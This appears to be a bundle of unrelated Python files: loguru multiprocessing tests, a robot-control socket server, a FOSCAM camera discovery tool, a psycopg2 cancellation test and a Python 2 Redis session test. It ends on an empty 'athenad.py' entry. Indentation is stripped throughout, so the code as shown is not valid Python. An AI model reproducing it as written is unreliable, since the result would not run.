def do_something(i):
logger.info("#{}", i)
def set_logger(logger_):
global logger
logger = logger_
def subworker(logger_):
logger_.info("Child")
def subworker_inheritance():
logger.info("Child")
def subworker_remove(logger_):
logger_.info("Child")
logger_.remove()
logger_.info("Nope")
def subworker_remove_inheritance():
logger.info("Child")
logger.remove()
logger.info("Nope")
def subworker_complete(logger_):
async def work():
logger_.info("Child")
await logger_.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(work())
def subworker_complete_inheritance():
async def work():
logger.info("Child")
await logger.complete()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(work())
def subworker_barrier(logger_, barrier):
logger_.info("Child")
barrier.wait()
time.sleep(0.5)
logger_.info("Nope")
def subworker_barrier_inheritance(barrier):
logger.info("Child")
barrier.wait()
time.sleep(0.5)
logger.info("Nope")
class Writer:
def __init__(self):
self._output = ""
def write(self, message):
self._output += message
def read(self):
return self._output
def test_apply_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with ctx.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_apply_async_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with ctx.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
with multiprocessing.Pool(1) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_process_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = ctx.Process(target=subworker, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_inheritance)
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
def test_remove_in_child_process_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = ctx.Process(target=subworker_remove, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_remove, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_remove_inheritance)
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
def test_remove_in_main_process_spawn(monkeypatch):
# Actually, this test may fail if sleep time in main process is too small (and no barrier used)
# In such situation, it seems the child process has not enough time to initialize itself
# It may fail with an "EOFError" during unpickling of the (garbage collected / closed) Queue
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
barrier = ctx.Barrier(2)
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = ctx.Process(target=subworker_barrier, args=(logger, barrier))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert process.exitcode == 0
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_fork():
writer = Writer()
barrier = multiprocessing.Barrier(2)
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_barrier, args=(logger, barrier))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert process.exitcode == 0
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_inheritance():
writer = Writer()
barrier = multiprocessing.Barrier(2)
logger.add(writer, format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_barrier_inheritance, args=(barrier,))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert process.exitcode == 0
assert writer.read() == "Child\nMain\n"
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_await_complete_spawn(capsys, monkeypatch, loop_is_none):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
async def writer(msg):
print(msg, end="")
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
loop = None if loop_is_none else new_loop
logger.add(writer, format="{message}", loop=loop, enqueue=True, catch=False)
process = ctx.Process(target=subworker_complete, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
async def local():
await logger.complete()
new_loop.run_until_complete(local())
out, err = capsys.readouterr()
assert out == "Child\n"
assert err == ""
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_await_complete_fork(capsys, loop_is_none):
async def writer(msg):
print(msg, end="")
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
loop = None if loop_is_none else new_loop
logger.add(writer, format="{message}", loop=loop, enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_complete, args=(logger,))
process.start()
process.join()
assert process.exitcode == 0
async def local():
await logger.complete()
new_loop.run_until_complete(local())
out, err = capsys.readouterr()
assert out == "Child\n"
assert err == ""
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.parametrize("loop_is_none", [True, False])
def test_await_complete_inheritance(capsys, loop_is_none):
async def writer(msg):
print(msg, end="")
new_loop = asyncio.new_event_loop()
asyncio.set_event_loop(new_loop)
loop = None if loop_is_none else new_loop
logger.add(writer, format="{message}", loop=loop, enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_complete_inheritance)
process.start()
process.join()
assert process.exitcode == 0
async def local():
await logger.complete()
new_loop.run_until_complete(local())
out, err = capsys.readouterr()
assert out == "Child\n"
assert err == ""
def test_not_picklable_sinks_spawn(monkeypatch, tmpdir, capsys):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True, catch=False)
logger.add(stream, format="{message}", enqueue=True)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
process = ctx.Process(target=subworker, args=[logger])
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_fork(capsys, tmpdir):
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True, catch=False)
logger.add(stream, format="{message}", enqueue=True, catch=False)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker, args=[logger])
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_inheritance(capsys, tmpdir):
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True, catch=False)
logger.add(stream, format="{message}", enqueue=True, catch=False)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True, catch=False)
process = multiprocessing.Process(target=subworker_inheritance)
process.start()
process.join()
assert process.exitcode == 0
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.skipif(sys.version_info < (3, 7), reason="No 'os.register_at_fork()' function")
@pytest.mark.parametrize("enqueue", [True, False])
@pytest.mark.parametrize("deepcopied", [True, False])
def test_no_deadlock_if_internal_lock_in_use(tmpdir, enqueue, deepcopied):
if deepcopied:
logger_ = copy.deepcopy(logger)
else:
logger_ = logger
output = tmpdir.join("stdout.txt")
stdout = output.open("w")
def slow_sink(msg):
time.sleep(0.5)
stdout.write(msg)
stdout.flush()
def main():
logger_.info("Main")
def worker():
logger_.info("Child")
logger_.add(slow_sink, format="{message}", enqueue=enqueue, catch=False)
thread = threading.Thread(target=main)
thread.start()
process = multiprocessing.Process(target=worker)
process.start()
thread.join()
process.join(1)
assert process.exitcode == 0
logger_.remove()
assert output.read() in ("Main\nChild\n", "Child\nMain\n")
@pytest.mark.skipif(sys.version_info < (3, 7), reason="No 'os.register_at_fork()' function")
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.parametrize("enqueue", [True, False])
def test_no_deadlock_if_external_lock_in_use(enqueue, capsys):
# Can't reproduce the bug on pytest (even if stderr is not wrapped), but let it anyway
logger.add(sys.stderr, enqueue=enqueue, catch=True, format="{message}")
num = 100
for i in range(num):
logger.info("This is a message: {}", i)
process = multiprocessing.Process(target=lambda: None)
process.start()
process.join(1)
assert process.exitcode == 0
logger.remove()
out, err = capsys.readouterr()
assert out == ""
assert err == "".join("This is a message: %d\n" % i for i in range(num))
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
@pytest.mark.skipif(platform.python_implementation() == "PyPy", reason="PyPy is too slow")
def test_complete_from_multiple_child_processes(capsys):
logger.add(lambda _: None, enqueue=True, catch=False)
num = 100
barrier = multiprocessing.Barrier(num)
def worker(barrier):
barrier.wait()
logger.complete()
processes = []
for _ in range(num):
process = multiprocessing.Process(target=worker, args=(barrier,))
process.start()
processes.append(process)
for process in processes:
process.join(5)
assert process.exitcode == 0
out, err = capsys.readouterr()
assert out == err == ""
|
server.py
|
###############################################################################
#
# The MIT License (MIT)
#
# Copyright (c) Vladimir Collak
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
###############################################################################
"""
Main server that receives commands from the controller and passed them to
the robot. Both the controller and robot connect to this server
Protocol Payload:
client_type = "controller" | "robot"
packet_type = "setup" | "normal"
command = "forward" | "backward" | "left" | "right" | "stop"
"""
import queue
import json
import logging
from settings import settings
def client_thread(conn, ip, port, MAX_BUFFER_SIZE = 4096):
""" main thread that is spun up for each client (robot or controller) that
connects """
def get_client_data():
""" Waits for and processes data from clients
:return input_from_client: String that the client sent
"""
# the input is in bytes, so decode it
input_from_client_bytes = conn.recv(MAX_BUFFER_SIZE)
# MAX_BUFFER_SIZE is how big the message can be
# this is test if it's sufficiently big
import sys
siz = sys.getsizeof(input_from_client_bytes)
if siz >= MAX_BUFFER_SIZE:
logging.warning("The length of input is probably too long: {}".format(siz))
# decode input and strip the end of line
input_from_client = input_from_client_bytes.decode("utf8").rstrip()
logging.debug("Received from client: {}".format(input_from_client))
#start adding data to the queue and respond OK to client
res = "ok"
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
return input_from_client
def parse_client_data(input_from_client):
""" Parses the string received from client
:param input_from_client: A string we received from the client
"""
try:
input_from_client_object = json.loads(input_from_client)
except:
logging.warning("Incorrect protocol. Unable to parse JSON")
return
return input_from_client_object
def get_commands():
"""
Waits to get data from the client, parses the data and extracts
the commands.
:return command: string - the command that the client sent
:return client_type: string - the type of client (robot or controller)
:return packet_type: string - the type of packet (normal, hello)
:return app_id: string - the app ID used for security purposes
:return input_from_client: string - raw input from the client
"""
input_from_client = get_client_data()
input_from_client_object = parse_client_data(input_from_client)
try:
command = input_from_client_object['command']
client_type = input_from_client_object["client_type"]
packet_type = input_from_client_object["packet_type"]
app_id = input_from_client_object["app_id"]
except:
logging.warning("Incorrect protocol. Unable to extract commands")
return
return (command, client_type, packet_type, app_id, input_from_client)
def send_quit_to_client():
"""
Final packet to tell teh client the server is disconnecting
"""
logging.info('Client ' + ip + ':' + port + " sent quit.")
res = "ok"
vysl = res.encode("utf8") # encode the result string
conn.sendall(vysl) # send it to client
conn.close() # close connection
logging.info('Connection ' + ip + ':' + port + ' ended')
def robot_loop():
"""
Loop that handles sending commands to the robot. Loop as long as
there is not error causing us to disconnect.
"""
logging.info(ip + ":" + port + " - robot connected")
remain_in_loop = True
while remain_in_loop:
if q.qsize() > 0:
logging.debug("Queue size: {}".format(q.qsize()))
while not q.empty():
data_from_queue = q.get()
logging.debug("Sending from queue to robot: {}".format(data_from_queue))
vysl = data_from_queue.encode("utf8") # encode the result string
try:
conn.sendall(vysl) # send it to client
except BrokenPipeError:
logging.critical("Unable to send to robot client. Broken pipe.")
remain_in_loop = False
def controller_loop(command):
"""
Loop that handles receiving commands from the controller. Loop until
controler asks to disconnect.
:param command: string that represnets a command received from the controller
"""
logging.info(ip + ":" + port + " - controller connected")
while command != "quit":
try:
#get commands from the client
(command, client_type,packet_type, app_id, input_from_client) = get_commands()
except:
logging.error("Unable to parse commands")
return command
if command == "quit":
return command
#add to the queue
if packet_type != "hello":
q.put(input_from_client)
try:
#get commands from client
(command, client_type,packet_type, app_id, input_from_client) = get_commands()
if app_id != settings.Settings.APP_ID.value:
logging.info("Wrong APP_ID. Unathorized client. Closing connection.")
send_quit_to_client()
return
#loop until clients exits or fail
if client_type == "robot":
robot_loop()
elif client_type == "controller":
command = controller_loop(command)
#either client can send "quit" to exit
if command == "quit":
send_quit_to_client()
logging.info("Exiting client {}:{}".format(ip,port))
except ConnectionResetError:
#TODO - need to handle this better. if the thread exists
#should re-start it
logging.error("Client {}:{} sent reset. Exiting...".format(ip, port))
except:
logging.error("Unable to parse client message. Closing connection.")
send_quit_to_client()
def start_server():
"""
Starts the socket server that listens on HOST and PORT. Will start a
client_thread each time there is a connection.
"""
import socket
soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# this is for easy starting/killing the app
soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#no dely on TCP send
soc.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
logging.debug("Socket started")
try:
host = settings.Settings.HOST.value
port = settings.Settings.PORT.value
soc.bind((host, port))
logging.info("Server UP on {}:{}".format(host,port))
except socket.error as msg:
import sys
logging.critical('Socket bind failed. Critical Error : ' + str(sys.exc_info()))
logging.critical("Exiting...")
sys.exit()
#Start listening on socket
soc.listen(10)
logging.info("Socket now accepting connections...")
# for handling task in separate jobs we need threading
from threading import Thread
# this will make an infinite loop needed for
# not reseting server for every client
while True:
conn, addr = soc.accept()
ip, port = str(addr[0]), str(addr[1])
logging.debug('Accepting connection from ' + ip + ':' + port)
try:
Thread(target=client_thread, args=(conn, ip, port)).start()
except:
logging.error("Unable to create client_thread.")
import traceback
traceback.print_exc()
soc.close()
#set up loging
logging.basicConfig(level = settings.Settings.LOGGING_LEVEL.value)
#server will use this queue to gather commands
#from controllers and send to robots
q = queue.Queue()
start_server()
|
foscamdiscover.py
|
#!/usr/bin/env python
# Discovers FOSCAM cameras on the local network
#
# By SukkoPera <software@sukkology.net>
# October 2018
import struct
import socket
import threading
import logging
class DiscovererException (Exception):
pass
class Discoverer (object):
BIND_IP = "" # All addresses
PORT = 10000
DEFAULT_AUTODISCOVER_INTERVAL = 5 # sec
def __init__ (self):
self._logger = logging.getLogger ('Discoverer')
self._handlers = []
self._keepGoing = False
def registerHandler (self, h):
if h not in self._handlers and callable (h):
self._handlers.append (h)
def _timerCallback (self):
self.discover ()
# Restart timer
if self._autodiscoverEnabled:
self.enableAutodiscovery (self._autodiscInterval)
def start (self, interval = DEFAULT_AUTODISCOVER_INTERVAL):
if not self._keepGoing:
self._autodiscoverTimer = threading.Thread (target = self._timerCallback, args = (interval, ), name = "Discovery Thread")
self._autodiscoverTimer.daemon = True
self._keepGoing = True
self._autodiscoverTimer.start ()
def stop (self):
self._keepGoing = False
self._autodiscoverTimer.join ()
def _timerCallback (self, interval):
while self._keepGoing:
s = self._trigger (interval)
self._waitForReplies (s)
def _waitForReplies (self, s):
timedout = False
while not timedout and self._keepGoing:
try:
reply, addr = s.recvfrom (1024)
# ~ print "Got %d byte(s) from %s:%u:" % (len (reply), addr[0], addr[1])
# ~ for i in Discoverer.hexdump (reply):
# ~ print (i)
try:
data = self._decodeReply (reply)
if data is not None:
devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled = data
for h in self._handlers:
h (devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled)
except DiscovererException as ex:
self._logger.error ("Cannot parse reply from %s: %s" % (addr[0], str (ex)))
except socket.error as ex:
# ~ print "Socket Error: %s" % str (ex)
timedout = True
def _trigger (self, timeout):
"""Sends the magic "trigger" packet, returning the socket to wait for
replies onto."""
s = socket.socket (socket.AF_INET, socket.SOCK_DGRAM)
# ~ s.setsockopt (socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.setsockopt (socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
# User Datagram Protocol, Src Port: 10000, Dst Port: 10000
s.bind ((Discoverer.BIND_IP, Discoverer.PORT))
# Data, 27 bytes: 4d4f5f490000000000000000000000040000000400000000000001
body = "4d4f5f490000000000000000000000040000000400000000000006".decode ("hex")
s.sendto (body, ('<broadcast>', Discoverer.PORT))
s.settimeout (timeout)
return s
def _decodeReply (self, reply):
#print "Got %d byte(s):" % len (reply)
#for i in Discoverer.hexdump (reply):
# print (i)
header = reply[:23]
text = reply[23:]
# Header is little-endian
proto, opcode, textlen = struct.unpack ("< 4s H 9x L 4x", header)
if proto != "MO_I":
raise DiscovererException ("Bad protocol")
elif opcode != 1:
# ~ raise DiscovererException ("Bad operation code")
# Not a discover reply, ignore
return None
elif len (text) != textlen:
raise DiscovererException ("Bad packet length")
else:
# We only know the meaning of the first 65 bytes
if textlen > 65:
self._logger.debug ("Reply is longer than expected, truncating")
text = text[:65]
# Text is big-endian (...)
devid, name, ip, mask, gw, dns, v1, v2, v3, v4, v5, v6, v7, v8, port, dhcpEnabled = struct.unpack ("> 12s 1x 21s 4s 4s 4s 4s 4x 8B H 1B", text)
# Do some postprocessing
name = name.rstrip ("\0")
# ~ mac = re.sub (r"(..)", r"\1:", devid)[:-1]
sysVer = "%u.%u.%u.%u" % (v1, v2, v3, v4)
appVer = "%u.%u.%u.%u" % (v5, v6, v7, v8)
ver = "%s_%s" % (sysVer, appVer)
ip = socket.inet_ntoa (ip)
mask = socket.inet_ntoa (mask)
gw = socket.inet_ntoa (gw)
dns = socket.inet_ntoa (dns)
dhcpEnabled = bool (dhcpEnabled)
return devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled
@staticmethod
def hexdump(byte_string, _len=16, base_addr=0, n=0, sep='-'):
"""https://codereview.stackexchange.com/questions/161616/python-hexdump-generator"""
FMT = '{} {} |{}|'
not_shown = [' ']
leader = (base_addr + n) % _len
next_n = n + _len - leader
while byte_string[n:]:
col0 = format(n + base_addr - leader, '08x')
col1 = not_shown * leader
col2 = ' ' * leader
leader = 0
for i in bytearray(byte_string[n:next_n]):
col1 += [format(i, '02x')]
col2 += chr(i) if 31 < i < 127 else '.'
trailer = _len - len(col1)
if trailer:
col1 += not_shown * trailer
col2 += ' ' * trailer
col1.insert(_len // 2, sep)
yield FMT.format(col0, ' '.join(col1), col2)
n = next_n
next_n += _len
if __name__ == "__main__":
import time
class Handler (object):
def __init__ (self):
self.cams = {}
def __call__ (self, devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled):
if devid not in self.cams:
print "Found %s (%s) at http://%s:%u" % (name, devid, ip, port)
self.cams[devid] = (devid, name, ver, ip, mask, gw, dns, port, dhcpEnabled)
logging.basicConfig ()
d = Discoverer ()
d.registerHandler (Handler ())
d.start ()
time.sleep (1)
d.stop ()
|
test_cancel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test_cancel.py - unit test for query cancellation
#
# Copyright (C) 2010-2019 Jan Urbański <wulczer@wulczer.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import time
import threading
import psycopg2
import psycopg2.extensions
from psycopg2 import extras
from .testconfig import dsn
import unittest
from .testutils import ConnectingTestCase, skip_before_postgres, slow
class CancelTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
cur = self.conn.cursor()
cur.execute('''
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)''')
self.conn.commit()
def test_empty_cancel(self):
self.conn.cancel()
@slow
@skip_before_postgres(8, 2)
def test_cancel(self):
errors = []
def neverending(conn):
cur = conn.cursor()
try:
self.assertRaises(psycopg2.extensions.QueryCanceledError,
cur.execute, "select pg_sleep(60)")
# make sure the connection still works
conn.rollback()
cur.execute("select 1")
self.assertEqual(cur.fetchall(), [(1, )])
except Exception as e:
errors.append(e)
raise
def canceller(conn):
cur = conn.cursor()
try:
conn.cancel()
except Exception as e:
errors.append(e)
raise
del cur
thread1 = threading.Thread(target=neverending, args=(self.conn, ))
# wait a bit to make sure that the other thread is already in
# pg_sleep -- ugly and racy, but the chances are ridiculously low
thread2 = threading.Timer(0.3, canceller, args=(self.conn, ))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
self.assertEqual(errors, [])
@slow
@skip_before_postgres(8, 2)
def test_async_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
self.assertRaises(psycopg2.OperationalError, async_conn.cancel)
extras.wait_select(async_conn)
cur = async_conn.cursor()
cur.execute("select pg_sleep(10)")
time.sleep(1)
self.assertTrue(async_conn.isexecuting())
async_conn.cancel()
self.assertRaises(psycopg2.extensions.QueryCanceledError,
extras.wait_select, async_conn)
cur.execute("select 1")
extras.wait_select(async_conn)
self.assertEqual(cur.fetchall(), [(1, )])
def test_async_connection_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
async_conn.close()
self.assertTrue(async_conn.closed)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test.py
|
import unittest
import redis
import uuid
import threading
from token_redis import *
class TestCh02(unittest.TestCase):
def setUp(self):
import redis
self.conn = redis.Redis(db=15)
def tearDown(self):
conn = self.conn
to_del = (
conn.keys('login:*') + conn.keys('recent:*') + conn.keys('viewed:*') +
conn.keys('cart:*') + conn.keys('cache:*') + conn.keys('delay:*') +
conn.keys('schedule:*') + conn.keys('inv:*'))
if to_del:
self.conn.delete(*to_del)
del self.conn
global QUIT, LIMIT
QUIT = False
LIMIT = 10000000
print
print
def test_login_cookies(self):
conn = self.conn
global LIMIT, QUIT
token = str(uuid.uuid4())
update_token(conn, token, 'username', 'itemX')
print "We just logged-in/updated token:", token
print "For user:", 'username'
print
print "What username do we get when we look-up that token?"
r = check_token(conn, token)
print r
print
self.assertTrue(r)
print "Let's drop the maximum number of cookies to 0 to clean them out"
print "We will start a thread to do the cleaning, while we stop it later"
LIMIT = 0
t = threading.Thread(target=clean_sessions, args=(conn,))
t.setDaemon(1) # to make sure it dies if we ctrl+C quit
t.start()
time.sleep(1)
QUIT = True
time.sleep(2)
if t.isAlive():
raise Exception("The clean sessions thread is still alive?!?")
s = conn.hlen('login:')
print "The current number of sessions still available is:", s
self.assertFalse(s)
def test_shoppping_cart_cookies(self):
conn = self.conn
global LIMIT, QUIT
token = str(uuid.uuid4())
print "We'll refresh our session..."
update_token(conn, token, 'username', 'itemX')
print "And add an item to the shopping cart"
add_to_cart(conn, token, "itemY", 3)
r = conn.hgetall('cart:' + token)
print "Our shopping cart currently has:", r
print
self.assertTrue(len(r) >= 1)
print "Let's clean out our sessions and carts"
LIMIT = 0
t = threading.Thread(target=clean_full_sessions, args=(conn,))
t.setDaemon(1) # to make sure it dies if we ctrl+C quit
t.start()
time.sleep(1)
QUIT = True
time.sleep(2)
if t.isAlive():
raise Exception("The clean sessions thread is still alive?!?")
r = conn.hgetall('cart:' + token)
print "Our shopping cart now contains:", r
self.assertFalse(r)
def test_cache_request(self):
conn = self.conn
token = str(uuid.uuid4())
def callback(request):
return "content for " + request
update_token(conn, token, 'username', 'itemX')
url = 'http://test.com/?item=itemX'
print "We are going to cache a simple request against", url
result = cache_request(conn, url, callback)
print "We got initial content:", repr(result)
print
self.assertTrue(result)
print "To test that we've cached the request, we'll pass a bad callback"
result2 = cache_request(conn, url, None)
print "We ended up getting the same response!", repr(result2)
self.assertEquals(result, result2)
self.assertFalse(can_cache(conn, 'http://test.com/'))
self.assertFalse(can_cache(conn, 'http://test.com/?item=itemX&_=1234536'))
def test_cache_rows(self):
import pprint
conn = self.conn
global QUIT
print "First, let's schedule caching of itemX every 5 seconds"
schedule_row_cache(conn, 'itemX', 5)
print "Our schedule looks like:"
s = conn.zrange('schedule:', 0, -1, withscores=True)
pprint.pprint(s)
self.assertTrue(s)
print "We'll start a caching thread that will cache the data..."
t = threading.Thread(target=cache_rows, args=(conn,))
t.setDaemon(1)
t.start()
time.sleep(1)
print "Our cached data looks like:"
r = conn.get('inv:itemX')
print repr(r)
self.assertTrue(r)
print
print "We'll check again in 5 seconds..."
time.sleep(5)
print "Notice that the data has changed..."
r2 = conn.get('inv:itemX')
print repr(r2)
print
self.assertTrue(r2)
self.assertTrue(r != r2)
print "Let's force un-caching"
schedule_row_cache(conn, 'itemX', -1)
time.sleep(1)
r = conn.get('inv:itemX')
print "The cache was cleared?", not r
print
self.assertFalse(r)
QUIT = True
time.sleep(2)
if t.isAlive():
raise Exception("The database caching thread is still alive?!?")
# We aren't going to bother with the top 10k requests are cached, as
# we already tested it as part of the cached requests test.
if __name__ == '__main__':
unittest.main()
|
athenad.py
|
